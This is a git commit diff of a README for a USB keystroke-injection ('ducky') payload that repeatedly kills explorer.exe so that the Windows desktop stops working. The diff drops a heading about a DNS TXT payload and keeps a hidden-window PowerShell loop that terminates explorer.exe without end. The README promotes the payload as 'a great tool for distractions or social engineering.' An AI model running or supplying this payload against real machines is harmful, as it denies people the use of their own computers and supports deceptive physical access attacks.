Update README.md

pull/468/head
Nate 2024-08-04 20:08:11 -05:00 committed by GitHub
parent 42d2d6e9d5
commit 5928326db7
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 1 additions and 2 deletions

View File

@ -5,8 +5,7 @@ A ducky script that kills explorer.exe repeatedly resulting in loss of Windows D
2. Logoff or restart to reset your windows session.
## Notes
A great tool for distractions or social engineering.
## Windows Commands (used in payload)
### Execute DNS TXT Payload
## Windows Command (used in payload)
```Powershell
powershell /w 1 while($true){kill -name explorer}
```